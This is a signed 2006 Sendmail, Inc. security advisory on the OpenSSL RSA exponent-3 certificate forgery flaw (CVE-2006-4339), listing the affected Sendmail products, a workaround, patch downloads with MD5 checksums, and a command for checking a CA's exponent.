-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ============================================================================= Sendmail-SA-200609-01 Security Advisory Sendmail, Inc. Topic: OpenSSL RSA Signature Forgery Class: Policy Bypass Severity: High Announced: 2006-10-02 09:00 PDT Affects: Sendmail Proxy 2.2.4 and earlier Sendmail Switch 3.2.4 and earlier Sendmail Switch for Windows 3.1.5 and earlier Sendmail Switch 3.1.10 and earlier Intelligent Quarantine 3.0 (includes Switch) Sendmail Advanced Message Store (SAMS) (includes Switch) Sendmail Sentrion 1.5.4 and earlier Mailstream Gatekeeper (includes Sentrion OS) Mailstream Governor (includes Sentrion OS) Sendmail Pro all versions Resolved: Sendmail Proxy 2.2.5 Sendmail Switch 3.2.5 Sendmail Switch for Windows 3.1.6 Sendmail Switch 3.1.11 Sendmail Sentrion 1.5.5 For general information regarding Sendmail, Inc. Security Advisories, including descriptions of the fields above, other security advisories, and the following sections, please visit . I. Background Both the sendmail MTA (part of several Sendmail products such as Sendmail Switch, Sendmail Advanced Message Store (SAMS), and Sentrion) and the Sendmail Proxy server (included with Sendmail Advanced Message Store (SAMS)) have the ability to accept SSL connections and validate client-side certificates sent to the MTA or Proxy server. The MTA can also initiate SSL connects and validate server-side certificates. This is accomplished using the OpenSSL library. II. Problem Description The OpenSSL Project recently released a security advisory announcing that it was possible to forge certificates for certain types of certificate authorities. More details regarding the vulnerability can be found in their advisory, referenced below. III. Impact The sendmail MTA and Sendmail Proxy server can optionally request and validate an SSL certificate to identify the connecting client or server. This validation is used to make policy decisions, such as whether to accept the connection, allow relaying, digitally sign the message, etc. Due to the OpenSSL bug, this validation can be subverted and the attacker can bypass policy restrictions. Note that this bug only affects sites using an exponent 3 certificate authority. You can check the exponent type used with the command: /usr/local/sendmail/smmta-8.13/sbin/openssl x509 -text -in cacert.pem | grep Exponent IV. Workaround If you are using an exponent 3 certificate authority and are unable to install the patch immediately, you can work around this problem by employing alternative methods of validating connections, such as SMTP authentication for MTA related policy. V. Solution Sendmail, Inc. has released patches for Sendmail Proxy, Switch, and Sentrion to address this problem. The patch incorporates the software fix provided by the OpenSSL project. Those patches are available to supported customers on their download site at: https://www.sendmail.com/customerlogin/ All customers can download the patches from: ftp://ftp.sendmail.com/patch/ Refer to the README included with each patch for installation instructions. The checksums for the available patches are: MD5 (smproxy-patch-2.2.5-Linux.tar.gz) = 35cfc377c0080102e7c125f4532a2679 MD5 (smproxy-patch-2.2.5-Solaris.tar.Z) = 34f79cffe304a77b7e9304ac8d77f7f5 MD5 (smswitch-patch-3.1.6-Windows.zip) = 66482522ae2825911affe95db467908b MD5 (smswitch-patch-3.1.11-Linux.tar.gz) = 9f1f595fca3ff5ddc84939fbdf2fffd9 MD5 (smswitch-patch-3.1.11-Solaris8.tar.Z) = 76072644f79d098dc5989c0ac4226bd8 MD5 (smswitch-patch-3.2.5-Linux.tar.gz) = 6188c2f4d1aae41bc062278bd3dbfd60 MD5 (smswitch-patch-3.2.5-Solaris8.tar.Z) = 90dc22433e492b4c40bc3869c72aef30 MD5 (SentriOS-1.5.5-906.tar) = 0a73437a1b6c9f3c4912010b2084775c VI. References CVE: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339 OpenSSL Advisory: http://www.openssl.org/news/secadv_20060905.txt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (Darwin) iD8DBQFFGxfbEEMlGKD4qgwRAvMuAJ9D+PLq41tJtoM1nLkbh0fiNhR1HgCgz8jU vIa+GKZt0nMU4X/m50M1NFY= =VUYG -----END PGP SIGNATURE-----